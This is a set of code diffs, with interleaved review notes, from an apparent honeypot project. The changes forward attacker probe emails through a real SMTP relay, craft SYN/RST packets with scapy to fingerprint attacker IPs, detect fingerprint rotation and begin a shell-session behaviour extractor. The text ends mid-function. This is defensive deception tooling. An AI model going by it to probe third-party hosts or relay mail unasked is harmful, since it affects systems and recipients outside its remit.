# Prepend the header before the existing content.
header_line = f"From: {mail_from}\r\n".encode()
return header_line + body
def forward_probe(
*,
svc_cfg: dict[str, Any],
stored_as: str,
decky_name: str,
mail_from: str,
rcpt_to: list[str],
artifacts_root: str = _ARTIFACTS_ROOT_DEFAULT,
) -> tuple[bool, str]:
"""Read the .eml from disk and forward it via the upstream relay.
Returns (True, "") on success or (False, reason) on failure.
Always safe to call in a thread — uses only blocking I/O.
"""
upstream_host = (svc_cfg.get("upstream_host") or "").strip()
if not upstream_host:
return False, "upstream_host not configured"
eml_path = Path(artifacts_root) / decky_name / "smtp" / stored_as
try:
body = eml_path.read_bytes()
except OSError as exc:
return False, f"cannot read eml: {exc}"
if not rcpt_to:
return False, "no recipients"
upstream_port = int(svc_cfg.get("upstream_port") or 25)
upstream_user = (svc_cfg.get("upstream_user") or "").strip()
upstream_pass = (svc_cfg.get("upstream_pass") or "").strip()
envelope_from = (svc_cfg.get("upstream_sender") or "").strip() or mail_from
# Ensure the message has a From: header so mail clients show the attacker's
# address rather than falling back to the envelope sender (upstream_sender).
# Minimal relay-test scripts often omit headers entirely.
body = _ensure_from_header(body, mail_from)
try:
with smtplib.SMTP(upstream_host, upstream_port, timeout=15) as conn:
conn.ehlo()
if conn.has_extn("STARTTLS"):
conn.starttls()
conn.ehlo()
if upstream_user and upstream_pass:
conn.login(upstream_user, upstream_pass)
conn.sendmail(envelope_from, rcpt_to, body)
return True, ""
except Exception as exc:
return False, str(exc)[:256]
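Review note: ``_ensure_from_header`` prepends the header directly, which works when the stored message already has a header block. For the header-less relay-test bodies the comment mentions, a blank separator line is needed, and ``mail_from`` is attacker-supplied, so CR/LF are worth stripping. A hedged variant under those assumptions; ``ensure_from_header`` is an illustrative name, not the committed function.

```python
import email


def ensure_from_header(body: bytes, mail_from: str) -> bytes:
    """Return body with a From: header added if one is absent (sketch)."""
    msg = email.message_from_bytes(body)
    if msg["From"]:
        return body
    # Drop CR/LF so the envelope address cannot inject extra headers.
    safe_from = mail_from.replace("\r", "").replace("\n", "")
    header = f"From: {safe_from}\r\n".encode()
    if not msg.keys():
        # No headers were parsed: the body is bare text, so add the blank
        # line that separates headers from content.
        return header + b"\r\n" + body
    return header + body


out = ensure_from_header(b"Subject: hi\r\n\r\nhello", "probe@attacker.example")
print(email.message_from_bytes(out)["From"])
```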

@@ -18,11 +18,8 @@ or IP can't escape into a shell.
from __future__ import annotations from __future__ import annotations
import asyncio import asyncio
import shlex
from typing import Any from typing import Any
from datetime import datetime
import base64
from datetime import datetime, timezone
from decnet.logging import get_logger from decnet.logging import get_logger
from decnet.orchestrator.drivers.base import ActivityDriver, ActivityResult from decnet.orchestrator.drivers.base import ActivityDriver, ActivityResult
@@ -226,36 +223,24 @@ class SSHDriver(ActivityDriver):
) -> ActivityResult: ) -> ActivityResult:
"""Write *content* to *path* inside *decky_name*'s ssh container. """Write *content* to *path* inside *decky_name*'s ssh container.
Streams base64 via stdin (mirrors :mod:`decnet.canary.planter`'s Delegates to :func:`decnet.decky_io.write_file_to_container`,
ARG_MAX-safe write — see commit c17b9e0). Sets file mode and, which carries the ARG_MAX-safe base64-via-stdin trick. Sets
when *mtime* is provided, ``touch -d`` to backdate the file so file mode and, when *mtime* is provided, ``touch -d`` to
it doesn't all stamp at wall-clock-now (the realism failure backdate the file (otherwise everything stamps at wall-clock-now
this migration is fixing). — the realism failure this path was originally fixing).
""" """
from decnet.decky_io import write_file_to_container
container = _container_for(decky_name) container = _container_for(decky_name)
b64 = base64.b64encode(content).decode("ascii") success, error = await write_file_to_container(
# touch -d accepts ISO 8601; we always emit UTC so the container, path, content, mode=mode, mtime=mtime, timeout=_TIMEOUT,
# container's local TZ doesn't drift the mtime.
if mtime is not None:
ts = mtime.astimezone(timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")
touch_cmd = f"touch -d {shlex.quote(ts)} {shlex.quote(path)}"
else:
touch_cmd = f"touch {shlex.quote(path)}"
sh_cmd = (
f"mkdir -p {shlex.quote(_dirname(path))} && "
f"base64 -d > {shlex.quote(path)} && "
f"chmod {mode:o} {shlex.quote(path)} && "
f"{touch_cmd}"
) )
argv = [_DOCKER, "exec", "-i", container, "sh", "-c", sh_cmd]
rc, _stdout, stderr = await _run_with_stdin(argv, b64.encode("ascii"))
success = rc == 0
payload: dict[str, Any] = { payload: dict[str, Any] = {
"dst_decky": decky_name, "dst_decky": decky_name,
"path": path, "path": path,
"bytes": len(content), "bytes": len(content),
"rc": rc, "rc": 0 if success else 1,
"stderr": stderr.strip()[:256] if not success else None, "stderr": error if not success else None,
} }
return ActivityResult(success=success, payload=payload) return ActivityResult(success=success, payload=payload)
@@ -283,11 +268,3 @@ class SSHDriver(ActivityDriver):
) )
def _dirname(path: str) -> str:
"""Pure-string dirname. We can't trust ``os.path.dirname`` on the
host to share the destination container's separator semantics, but
deckies are POSIX so a plain ``rfind('/')`` suffices."""
idx = path.rfind("/")
if idx <= 0:
return "/"
return path[:idx]

@@ -131,13 +131,13 @@ async def _resolve_personas(
topology = await repo.get_topology(topology_id) topology = await repo.get_topology(topology_id)
if not topology: if not topology:
return [], source return [], source
return ( if isinstance(topology, dict):
parse_personas( raw = topology.get("email_personas")
topology.get("email_personas"), lang = topology.get("language_default") or "en"
language_default=topology.get("language_default") or "en", else:
), raw = topology.email_personas
source, lang = topology.language_default or "en"
) return parse_personas(raw, language_default=lang), source
# Fleet / shard / anything else → global pool. # Fleet / shard / anything else → global pool.
return global_pool.load(), source return global_pool.load(), source
@@ -175,7 +175,7 @@ async def pick(
) )
return None return None
active = [p for p in personas if in_active_hours(p, now_dt.hour)] active = [p for p in personas if in_active_hours(p, now_dt)]
if len(active) < 2: if len(active) < 2:
logger.debug( logger.debug(
"emailgen pick: source=%s mail_decky=%s only %d personas in-hours", "emailgen pick: source=%s mail_decky=%s only %d personas in-hours",

@@ -311,17 +311,22 @@ async def _resolve_personas(
return enriched return enriched
def _topology_personas(topology: Optional[dict[str, Any]]) -> list[EmailPersona]: def _topology_personas(topology) -> list[EmailPersona]:
if not topology: if not topology:
return [] return []
raw = topology.get("email_personas") if isinstance(topology, dict):
raw = topology.get("email_personas")
lang = topology.get("language_default") or "en"
else:
raw = topology.email_personas
lang = topology.language_default or "en"
if raw is None: if raw is None:
return [] return []
if isinstance(raw, list): if isinstance(raw, list):
return parse_personas(raw, language_default=topology.get("language_default") or "en") return parse_personas(raw, language_default=lang)
if isinstance(raw, str): if isinstance(raw, str):
try: try:
return parse_personas(json.loads(raw), language_default=topology.get("language_default") or "en") return parse_personas(json.loads(raw), language_default=lang)
except json.JSONDecodeError: except json.JSONDecodeError:
return [] return []
return [] return []
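Review note: the dict-or-model branch for ``email_personas`` and ``language_default`` now appears in both scheduler files. One way to avoid the duplication is a small accessor; the sketch below is an assumption about how that could look, with ``topology_field`` as a hypothetical name and ``SimpleNamespace`` standing in for the ORM row.

```python
from types import SimpleNamespace
from typing import Any


def topology_field(topology: Any, name: str) -> Any:
    """Read a field from a topology that may be a dict or an attribute object."""
    if topology is None:
        return None
    if isinstance(topology, dict):
        return topology.get(name)
    return getattr(topology, name, None)


as_dict = {"email_personas": [], "language_default": None}
as_row = SimpleNamespace(email_personas="[]", language_default="es")

# Callers keep the existing `or "en"` fallback for the language.
print(topology_field(as_dict, "language_default") or "en")
print(topology_field(as_row, "language_default") or "en")
```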

@@ -25,6 +25,7 @@ import secrets
from datetime import datetime, timezone from datetime import datetime, timezone
from typing import Any, Optional from typing import Any, Optional
from decnet.bus import topics as _topics
from decnet.bus.factory import get_bus from decnet.bus.factory import get_bus
from decnet.bus.publish import ( from decnet.bus.publish import (
publish_safely, publish_safely,
@@ -34,6 +35,7 @@ from decnet.bus.publish import (
from decnet.logging import get_logger from decnet.logging import get_logger
from decnet.orchestrator import events, scheduler from decnet.orchestrator import events, scheduler
from decnet.orchestrator.drivers import get_driver_for from decnet.orchestrator.drivers import get_driver_for
from decnet.orchestrator.drivers.smtp_relay import forward_probe
from decnet.orchestrator.emailgen import ( from decnet.orchestrator.emailgen import (
events as email_events, events as email_events,
scheduler as email_scheduler, scheduler as email_scheduler,
@@ -127,6 +129,7 @@ async def orchestrator_worker(
# operator's intent rather than the baked-in defaults. A failure # operator's intent rather than the baked-in defaults. A failure
# here logs and falls through; the planner already holds defaults. # here logs and falls through; the planner already holds defaults.
await _refresh_realism_config(repo) await _refresh_realism_config(repo)
await _refresh_llm_config(repo)
shutdown = asyncio.Event() shutdown = asyncio.Event()
heartbeat_task = asyncio.create_task( heartbeat_task = asyncio.create_task(
@@ -138,6 +141,9 @@ async def orchestrator_worker(
control_task = asyncio.create_task( control_task = asyncio.create_task(
run_control_listener(bus, "orchestrator", shutdown), run_control_listener(bus, "orchestrator", shutdown),
) )
probe_task = asyncio.create_task(
_run_smtp_probe_listener(repo, shutdown),
)
tick_n = 0 tick_n = 0
try: try:
while not shutdown.is_set(): while not shutdown.is_set():
@@ -156,8 +162,9 @@ async def orchestrator_worker(
await _periodic_prune(repo) await _periodic_prune(repo)
if tick_n % _REALISM_CONFIG_REFRESH_TICKS == 0: if tick_n % _REALISM_CONFIG_REFRESH_TICKS == 0:
await _refresh_realism_config(repo) await _refresh_realism_config(repo)
await _refresh_llm_config(repo)
finally: finally:
for t in (heartbeat_task, control_task): for t in (heartbeat_task, control_task, probe_task):
t.cancel() t.cancel()
with contextlib.suppress(Exception, asyncio.CancelledError): with contextlib.suppress(Exception, asyncio.CancelledError):
await t await t
@@ -218,6 +225,18 @@ async def _refresh_realism_config(repo: BaseRepository) -> None:
logger.warning("realism config refresh: rejected payload: %s", exc) logger.warning("realism config refresh: rejected payload: %s", exc)
async def _refresh_llm_config(repo: BaseRepository) -> None:
"""Pull operator-tuned LLM config from realism_config into the backend cache."""
from decnet.realism.llm.config import apply, load_from_db
cfg = await load_from_db(repo)
if cfg is None:
return
try:
apply(cfg)
except Exception as exc: # noqa: BLE001
logger.warning("llm config refresh: apply failed: %s", exc)
def _roll_action_kind(rng: secrets.SystemRandom) -> str: def _roll_action_kind(rng: secrets.SystemRandom) -> str:
total = sum(w for _, w in _ACTION_WEIGHTS) total = sum(w for _, w in _ACTION_WEIGHTS)
target = rng.randint(1, total) target = rng.randint(1, total)
@@ -303,7 +322,7 @@ async def _pick_action(
) )
elif kind == "email": elif kind == "email":
try: try:
action = await email_scheduler.pick(repo, rand=rng) action = await email_scheduler.pick(repo, rand=rng) # type: ignore[assignment]
except Exception as exc: # noqa: BLE001 except Exception as exc: # noqa: BLE001
logger.debug("orchestrator: email pick failed: %s", exc) logger.debug("orchestrator: email pick failed: %s", exc)
action = None action = None
@@ -467,6 +486,100 @@ async def _bump_synthetic_file_after_edit(repo, action, result) -> None:
await repo.update_synthetic_file(action.synthetic_file_uuid, patch) await repo.update_synthetic_file(action.synthetic_file_uuid, patch)
async def _run_smtp_probe_listener(
repo: BaseRepository,
shutdown: asyncio.Event,
) -> None:
"""Subscribe to smtp.probe.pending and forward probe emails upstream.
Runs as a long-lived subtask alongside the tick loop. When a probe lands
we check whether this (attacker_ip, decky) pair has already been forwarded
probe_limit times; if not, we forward it via the master's real internet
connection and store a probe_relay bounty with the result.
"""
try:
bus = get_bus(client_name="orchestrator-probe")
await bus.connect()
sub = bus.subscribe(_topics.smtp("probe.pending"))
async with sub:
async for event in sub:
if shutdown.is_set():
break
try:
await _handle_probe_pending(repo, event.payload)
except Exception as exc: # noqa: BLE001
logger.warning("smtp probe listener: handle error: %s", exc)
except asyncio.CancelledError:
raise
except Exception as exc: # noqa: BLE001
logger.warning("smtp probe listener: bus unavailable: %s", exc)
finally:
with contextlib.suppress(Exception):
await bus.close()
async def _handle_probe_pending(repo: BaseRepository, payload: dict) -> None:
decky_name = (payload.get("decky") or "").strip()
attacker_ip = (payload.get("attacker_ip") or "").strip()
stored_as = (payload.get("stored_as") or "").strip()
mail_from = (payload.get("mail_from") or "").strip()
rcpt_to_raw = (payload.get("rcpt_to") or "").strip()
if not (decky_name and attacker_ip and stored_as):
return
decky_row = await repo.get_fleet_decky_by_name(decky_name)
if not decky_row:
return
svc_cfg = (
(decky_row.get("decky_config") or {})
.get("service_config", {})
.get("smtp_relay") or {}
)
if not (svc_cfg.get("upstream_host") or "").strip():
return
probe_limit = int(svc_cfg.get("probe_limit") or 1)
already_sent = await repo.count_probe_relays(attacker_ip, decky_name)
if already_sent >= probe_limit:
return
rcpt_to = [r.strip() for r in rcpt_to_raw.split(",") if r.strip()]
artifacts_root = os.environ.get("DECNET_ARTIFACTS_ROOT", "/var/lib/decnet/artifacts")
loop = asyncio.get_running_loop()
ok, reason = await loop.run_in_executor(
None,
lambda: forward_probe(
svc_cfg=svc_cfg,
stored_as=stored_as,
decky_name=decky_name,
mail_from=mail_from,
rcpt_to=rcpt_to,
artifacts_root=artifacts_root,
),
)
await repo.add_bounty({
"decky": decky_name,
"service": "smtp_relay",
"attacker_ip": attacker_ip,
"bounty_type": "probe_relay",
"payload": {
"stored_as": stored_as,
"forwarded": ok,
**({"fwd_error": reason} if not ok else {}),
},
})
if ok:
logger.info("smtp probe forwarded decky=%s ip=%s", decky_name, attacker_ip)
else:
logger.warning(
"smtp probe forward failed decky=%s ip=%s error=%s",
decky_name, attacker_ip, reason,
)
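Review note: the shape of ``_handle_probe_pending`` (limit check, recipient parsing, blocking forward off the event loop) can be sketched in isolation. ``blocking_forward`` is a hypothetical stand-in for ``forward_probe`` and ``handle`` is an illustrative name; ``asyncio.to_thread`` is used here as an alternative to the ``run_in_executor`` + ``lambda`` pair in the diff.

```python
import asyncio
import time


def parse_rcpt(raw: str) -> list:
    """Split a comma-separated recipient string, dropping empty entries."""
    return [r.strip() for r in raw.split(",") if r.strip()]


def blocking_forward(rcpt_to: list) -> tuple:
    """Stand-in for forward_probe: blocking I/O that returns (ok, reason)."""
    if not rcpt_to:
        return False, "no recipients"
    time.sleep(0.01)  # simulates the SMTP round trip
    return True, ""


async def handle(raw_rcpt: str, already_sent: int, probe_limit: int = 1):
    # Skip once this (attacker_ip, decky) pair has used up its forwards.
    if already_sent >= probe_limit:
        return None
    # Run the blocking call in a worker thread so the tick loop keeps running.
    return await asyncio.to_thread(blocking_forward, parse_rcpt(raw_rcpt))


print(asyncio.run(handle("a@x.example, ,b@y.example", already_sent=0)))
```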
async def _record_synthetic_file(repo, action) -> None: async def _record_synthetic_file(repo, action) -> None:
"""Persist (or patch) a synthetic_files row after a FileAction plant. """Persist (or patch) a synthetic_files row after a FileAction plant.

@@ -48,7 +48,7 @@ def _send_syn(
 Craft a TCP SYN with common options and send it. Returns the
 SYN-ACK response packet or None on timeout/failure.
 """
-from scapy.all import IP, TCP, conf, sr1
+from scapy.all import IP, TCP, conf, sr1  # type: ignore[attr-defined]
 # Suppress scapy's noisy output
 conf.verb = 0
@@ -83,7 +83,7 @@ def _send_syn(
 return None
 # Verify it's a SYN-ACK (flags == 0x12)
-from scapy.all import TCP as TCPLayer
+from scapy.all import TCP as TCPLayer  # type: ignore[attr-defined]
 if not resp.haslayer(TCPLayer):
 return None
 if resp[TCPLayer].flags != 0x12:  # SYN-ACK
@@ -103,7 +103,7 @@ def _send_rst(
 ) -> None:
 """Send RST to clean up the half-open connection."""
 try:
-from scapy.all import IP, TCP, send
+from scapy.all import IP, TCP, send  # type: ignore[attr-defined]
 rst = (
 IP(dst=host)
 / TCP(
@@ -124,7 +124,7 @@ def _parse_synack(resp: Any) -> dict[str, Any]:
 """
 Extract fingerprint fields from a scapy SYN-ACK response packet.
 """
-from scapy.all import IP, TCP
+from scapy.all import IP, TCP  # type: ignore[attr-defined]
 ip_layer = resp[IP]
 tcp_layer = resp[TCP]


@@ -27,6 +27,9 @@ from datetime import datetime, timezone
 from pathlib import Path
 from typing import Any, Callable
+from sqlalchemy.engine import Engine
+from sqlmodel import Session
 from decnet.bus import topics as _topics
 from decnet.bus.base import BaseBus
 from decnet.bus.factory import get_bus
@@ -35,6 +38,10 @@ from decnet.bus.publish import (
 run_control_listener,
 run_health_heartbeat,
 )
+from decnet.correlation.fingerprint_rotation import (
+ProbeType,
+record_fingerprint,
+)
 from decnet.logging import get_logger
 from decnet.prober.hassh import hassh_server
 from decnet.prober.jarm import JARM_EMPTY_HASH, jarm_hash
@@ -44,6 +51,21 @@ from decnet.telemetry import traced as _traced
 logger = get_logger("prober")
+def _build_sync_engine() -> Engine:
+"""Construct a sync SQLite engine for rotation-detection state.
+Used inline by the prober; it lives outside the async repository
+layer because rotation detection is a sync hook on a sync probe
+path. Honors the same defaulting as
+``decnet.web.db.sqlite.repository.SQLiteRepository``.
+"""
+import os
+from decnet.config import _ROOT
+from decnet.web.db.sqlite.database import get_sync_engine
+db_path = os.environ.get("DECNET_DB_PATH", str(_ROOT / "decnet.db"))
+return get_sync_engine(db_path)
 # ─── Default ports per probe type ───────────────────────────────────────────
 # JARM: common C2 callback / TLS server ports
@@ -233,6 +255,14 @@ def _discover_attackers(json_path: Path, position: int) -> tuple[set[str], int]:
 ProbePublishFn = Callable[[str, dict[str, Any]], None]
+# Rotation recorder: takes (attacker_ip, port, probe_type, new_hash) and
+# performs the rotation-detection upsert + derived-event emission for the
+# DEBT-032 substrate-fingerprint flow. Optional; when None the prober
+# behaves exactly as before (raw fingerprint emit only, no rotation
+# detection). Construction lives at worker startup so phase functions
+# don't have to know about the DB engine.
+RotationRecorderFn = Callable[[str, int, "ProbeType", str], None]
 @_traced("prober.probe_cycle")
 def _probe_cycle(
@@ -245,6 +275,7 @@ def _probe_cycle(
 json_path: Path,
 timeout: float = 5.0,
 publish_fn: ProbePublishFn | None = None,
+record_rotation: RotationRecorderFn | None = None,
 ) -> None:
 """
 Probe all known attacker IPs with JARM, HASSH, and TCP/IP fingerprinting.
@@ -263,13 +294,13 @@ def _probe_cycle(
 ip_probed = probed.setdefault(ip, {})
 # Phase 1: JARM (TLS fingerprinting)
-_jarm_phase(ip, ip_probed, jarm_ports, log_path, json_path, timeout, publish_fn)
+_jarm_phase(ip, ip_probed, jarm_ports, log_path, json_path, timeout, publish_fn, record_rotation)
 # Phase 2: HASSHServer (SSH fingerprinting)
-_hassh_phase(ip, ip_probed, ssh_ports, log_path, json_path, timeout, publish_fn)
+_hassh_phase(ip, ip_probed, ssh_ports, log_path, json_path, timeout, publish_fn, record_rotation)
 # Phase 3: TCP/IP stack fingerprinting
-_tcpfp_phase(ip, ip_probed, tcpfp_ports, log_path, json_path, timeout, publish_fn)
+_tcpfp_phase(ip, ip_probed, tcpfp_ports, log_path, json_path, timeout, publish_fn, record_rotation)
 @_traced("prober.jarm_phase")
@@ -281,6 +312,7 @@ def _jarm_phase(
 json_path: Path,
 timeout: float,
 publish_fn: ProbePublishFn | None = None,
+record_rotation: RotationRecorderFn | None = None,
 ) -> None:
 """JARM-fingerprint an IP on the given TLS ports."""
 done = ip_probed.setdefault("jarm", set())
@@ -301,6 +333,8 @@ def _jarm_phase(
 msg=f"JARM {ip}:{port} = {h}",
 )
 logger.info("prober: JARM %s:%d = %s", ip, port, h)
+if record_rotation is not None:
+record_rotation(ip, port, "jarm", h)
 if publish_fn is not None:
 publish_fn(
 "jarm",
@@ -387,6 +421,7 @@ def _hassh_phase(
 json_path: Path,
 timeout: float,
 publish_fn: ProbePublishFn | None = None,
+record_rotation: RotationRecorderFn | None = None,
 ) -> None:
 """HASSHServer-fingerprint an IP on the given SSH ports."""
 done = ip_probed.setdefault("hassh", set())
@@ -412,6 +447,8 @@ def _hassh_phase(
 msg=f"HASSH {ip}:{port} = {result['hassh_server']}",
 )
 logger.info("prober: HASSH %s:%d = %s", ip, port, result["hassh_server"])
+if record_rotation is not None:
+record_rotation(ip, port, "hassh", result["hassh_server"])
 if publish_fn is not None:
 publish_fn(
 "hassh",
@@ -445,6 +482,7 @@ def _tcpfp_phase(
 json_path: Path,
 timeout: float,
 publish_fn: ProbePublishFn | None = None,
+record_rotation: RotationRecorderFn | None = None,
 ) -> None:
 """TCP/IP stack fingerprint an IP on the given ports."""
 done = ip_probed.setdefault("tcpfp", set())
@@ -478,6 +516,8 @@ def _tcpfp_phase(
 msg=f"TCPFP {ip}:{port} = {result['tcpfp_hash']}",
 )
 logger.info("prober: TCPFP %s:%d = %s", ip, port, result["tcpfp_hash"])
+if record_rotation is not None:
+record_rotation(ip, port, "tcpfp", result["tcpfp_hash"])
 if publish_fn is not None:
 publish_fn(
 "tcpfp",
@@ -586,6 +626,61 @@ async def prober_worker(
 event_type,
 )
+# Substrate-rotation detection (DEBT-032) — open a sync engine for
+# the prober's lifetime; recorder closes a session per call so we
+# never hold a connection across phase boundaries. Failure to
+# connect is non-fatal: probes continue, rotation detection is
+# silently disabled.
+rotation_engine: Engine | None = None
+record_rotation: RotationRecorderFn | None = None
+try:
+rotation_engine = _build_sync_engine()
+except Exception as exc:  # noqa: BLE001
+logger.warning(
+"prober: rotation-detection DB unavailable, "
+"running with rotation detection disabled: %s", exc,
+)
+if rotation_engine is not None:
+def _publish_rotation(event_type: str, payload: dict[str, Any]) -> None:
+raw_publish(
+_topics.attacker(_topics.ATTACKER_FINGERPRINT_ROTATED),
+payload,
+event_type,
+)
+def _syslog_rotation(event_type: str, payload: dict[str, Any]) -> None:
+_write_event(
+log_path, json_path,
+"fingerprint_rotated",
+target_ip=payload["attacker_ip"],
+target_port=str(payload["port"]),
+probe_type=payload["probe_type"],
+old_hash=payload.get("old_hash") or "",
+new_hash=payload["new_hash"],
+rotation_count=str(payload["rotation_count"]),
+msg=(
+f"FP rotation {payload['attacker_ip']}:{payload['port']} "
+f"{payload['probe_type']} {payload.get('old_hash')} -> "
+f"{payload['new_hash']}"
+),
+)
+def record_rotation(
+ip: str, port: int, probe_type: ProbeType, new_hash: str,
+) -> None:
+with Session(rotation_engine) as session:
+record_fingerprint(
+session,
+attacker_ip=ip,
+port=port,
+probe_type=probe_type,
+new_hash=new_hash,
+ts=datetime.now(timezone.utc),
+publish_fn=_publish_rotation,
+syslog_fn=_syslog_rotation,
+)
 shutdown = asyncio.Event()
 heartbeat_task = asyncio.create_task(run_health_heartbeat(bus, "prober"))
 control_task = asyncio.create_task(
@@ -612,6 +707,7 @@ async def prober_worker(
 jarm_ports, hassh_ports, tcp_ports,
 log_path, json_path, timeout,
 _publish_attacker,
+record_rotation,
 )
 try:
@@ -626,3 +722,6 @@ async def prober_worker(
 if bus is not None:
 with contextlib.suppress(Exception):
 await bus.close()
+if rotation_engine is not None:
+with contextlib.suppress(Exception):
+rotation_engine.dispose()
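
The recorder contract used throughout this diff, a callable taking `(attacker_ip, port, probe_type, new_hash)`, can be illustrated with an in-memory stand-in. This is only a sketch under stated assumptions: `make_memory_recorder` and the shape of the emitted dict are hypothetical, and the real `record_fingerprint` keeps its state in the database through a `Session` rather than in a dict.

```python
from typing import Any, Callable

RotationRecorderFn = Callable[[str, int, str, str], None]


def make_memory_recorder(
    emit: Callable[[dict[str, Any]], None],
) -> RotationRecorderFn:
    """Hypothetical in-memory recorder: emit an event when a hash changes."""
    last_seen: dict[tuple[str, int, str], str] = {}
    rotations: dict[tuple[str, int, str], int] = {}

    def record(ip: str, port: int, probe_type: str, new_hash: str) -> None:
        key = (ip, port, probe_type)
        old_hash = last_seen.get(key)
        last_seen[key] = new_hash
        # First sighting or unchanged hash: nothing to report.
        if old_hash is None or old_hash == new_hash:
            return
        rotations[key] = rotations.get(key, 0) + 1
        emit({
            "attacker_ip": ip,
            "port": port,
            "probe_type": probe_type,
            "old_hash": old_hash,
            "new_hash": new_hash,
            "rotation_count": rotations[key],
        })

    return record


events: list[dict[str, Any]] = []
recorder = make_memory_recorder(events.append)
recorder("203.0.113.7", 443, "jarm", "aaa")  # first sighting, no event
recorder("203.0.113.7", 443, "jarm", "aaa")  # unchanged, no event
recorder("203.0.113.7", 443, "jarm", "bbb")  # rotation, one event
```

Because the phase functions only see the callable, a stand-in like this could plausibly be passed as `record_rotation` in tests without touching a database.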


@@ -0,0 +1,25 @@
"""BEHAVE-SHELL extraction engine — DECNET's official implementation.
Per ``development/BEHAVE-EXTRACTOR.md``: this package is a pure
library. Workers (``BEHAVE-INTEGRATION.md`` Phase 4) own I/O, bus
emission, and persistence. The engine just turns one PTY session into
``Iterable[Observation]``.
BEHAVE is the spec; DECNET is the engine.
"""
from __future__ import annotations
from decnet.profiler.behave_shell.extract import (
DEFAULT_SOURCE,
build_context,
extract_session,
)
# Phase H.5-pre: extractor is feature-complete (37/37 Tier-A primitives
# emit; calibration grid honest). The ``-pre`` suffix stays until
# ``BEHAVE-INTEGRATION.md`` Phase 4 lands the worker wiring + observations
# table writes + AttackerDetail panel; only then does H.5 proper drop the
# suffix and tag v0.
__version__ = "0.1.0-pre"
__all__ = ["DEFAULT_SOURCE", "build_context", "extract_session", "__version__"]


@@ -0,0 +1,573 @@
"""SessionContext: precomputed bundle every feature function reads from.
A naïve engine re-walks the event stream once per primitive. We don't
do that — one walk over the events builds this context, every feature
reads from it. Adding a new feature is O(1) cost on the parse side.
Step 1 fills ``iats`` (inter-key intervals between input events) and
``paste_bursts`` (contiguous runs of paste-class events). Step 4
will fill ``commands`` / ``inter_cmd_iats`` / ``output_per_cmd``.
"""
from __future__ import annotations
import math
from dataclasses import dataclass, field
from typing import Iterable, Mapping
from decnet.profiler.behave_shell._intent import (
LEXEME_MAX_LEN,
NEGATIVE_LEXEMES,
OBSCENITY_LEXEMES,
POSITIVE_LEXEMES,
)
from decnet.profiler.behave_shell._parse import (
AsciinemaEvent,
Command,
PasteBurst,
PromptLine,
detect_error_in_output,
extract_prompt_lines,
hash_token,
strip_ansi,
)
from decnet.profiler.behave_shell._thresholds import (
IKI_THINK_MAX_S,
LAYOUT_BIGRAM_TOP_N,
PASTE_BURST_MAX_IAT_S,
PASTE_MIN_CHARS_PER_EVENT,
PROMPT_LINE_MAX_CHARS,
SHORTCUT_CTRL_BYTES,
)
@dataclass(frozen=True, slots=True)
class _LexCounters:
"""Lexical counters from the typed-text walk (G.0).
Internal to the ctx-builder; flattened onto SessionContext fields
in :func:`build_session_context`.
"""
obscenity_hits: int = 0
positive_lex_hits: int = 0
negative_lex_hits: int = 0
caps_run_max: int = 0
bang_run_max: int = 0
@dataclass(frozen=True, slots=True)
class SessionContext:
sid: str
source: str
evidence_ref: str
t_start: float
t_end: float
duration_s: float
input_events: tuple[AsciinemaEvent, ...] = field(default_factory=tuple)
output_events: tuple[AsciinemaEvent, ...] = field(default_factory=tuple)
# Step 1 derivations
iats: tuple[float, ...] = field(default_factory=tuple)
paste_bursts: tuple[PasteBurst, ...] = field(default_factory=tuple)
paste_event_count: int = 0
# Step 4 derivations — command segmentation
commands: tuple[Command, ...] = field(default_factory=tuple)
inter_cmd_iats: tuple[float, ...] = field(default_factory=tuple)
output_per_cmd: tuple[int, ...] = field(default_factory=tuple)
# Step B.1 derivations — typing bursts (IATs split at think-pauses)
typing_bursts: tuple[tuple[float, ...], ...] = field(default_factory=tuple)
# Step B.3 derivations — error-correction signals
backspace_count: int = 0
backspace_iats: tuple[float, ...] = field(default_factory=tuple)
kill_line_count: int = 0
# Step B.4 derivations — per-command intra-typing IATs
intra_command_iats: tuple[tuple[float, ...], ...] = field(default_factory=tuple)
# Step F.0 derivations — PS1 prompt lines detected in the output stream
prompt_lines: tuple[PromptLine, ...] = field(default_factory=tuple)
# Step F.4 derivations — typed-only character histograms for keyboard
# layout fingerprinting (PII boundary lifted by ANTI for Phase F).
typed_unigram_counts: Mapping[str, int] = field(default_factory=dict)
typed_bigram_counts: Mapping[str, int] = field(default_factory=dict)
typed_letter_count: int = 0
# Step G.0 derivations — lexical counters from the same single-pass
# typed-text walk. No raw text retained; only fixed-vocabulary
# membership counts and run-lengths. Drives valence (G.5), arousal
# (G.6), and frustration_venting (G.8).
obscenity_hits: int = 0
positive_lex_hits: int = 0
negative_lex_hits: int = 0
caps_run_max: int = 0
bang_run_max: int = 0
def _detect_paste_bursts(
inputs: list[AsciinemaEvent],
) -> tuple[tuple[PasteBurst, ...], int]:
"""Group consecutive paste-class input events into PasteBursts.
A paste-class event is one with ``len(data) >= PASTE_MIN_CHARS_PER_EVENT``.
Two adjacent paste-class events collapse into the same burst when
their IAT is within ``PASTE_BURST_MAX_IAT_S``; otherwise a new
burst opens. Returns the bursts and the total count of paste-class
events (the same number the ``BEHAVE`` prototype calls ``paste_events``).
"""
bursts: list[PasteBurst] = []
paste_count = 0
cur_start: float | None = None
cur_end: float = 0.0
cur_chars: int = 0
cur_events: int = 0
last_t: float | None = None
def _close() -> None:
nonlocal cur_start, cur_end, cur_chars, cur_events
if cur_start is not None and cur_events > 0:
bursts.append(PasteBurst(
start_ts=cur_start,
end_ts=cur_end,
char_count=cur_chars,
event_count=cur_events,
))
cur_start = None
cur_end = 0.0
cur_chars = 0
cur_events = 0
for t, _kind, data in inputs:
is_paste = len(data) >= PASTE_MIN_CHARS_PER_EVENT
if is_paste:
paste_count += 1
if cur_start is None or (
last_t is not None and (t - last_t) > PASTE_BURST_MAX_IAT_S
):
_close()
cur_start = t
cur_end = t
cur_chars += len(data)
cur_events += 1
else:
_close()
last_t = t
_close()
return tuple(bursts), paste_count
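
The grouping rule described in the docstring can be tried on a toy event list. The sketch below is a simplified re-statement, not the module's code: `group_paste_bursts` is a hypothetical name, bursts are plain tuples instead of `PasteBurst`, and both threshold values are assumed for illustration.

```python
PASTE_MIN_CHARS = 8      # assumed value, for illustration only
PASTE_MAX_GAP_S = 0.05   # assumed value, for illustration only


def group_paste_bursts(events):
    """Return (start_ts, end_ts, chars, n_events) per burst."""
    bursts = []
    cur = None       # [start, end, chars, n] of the currently open burst
    last_t = None    # timestamp of the previous input event of any kind
    for t, _kind, data in events:
        if len(data) >= PASTE_MIN_CHARS:
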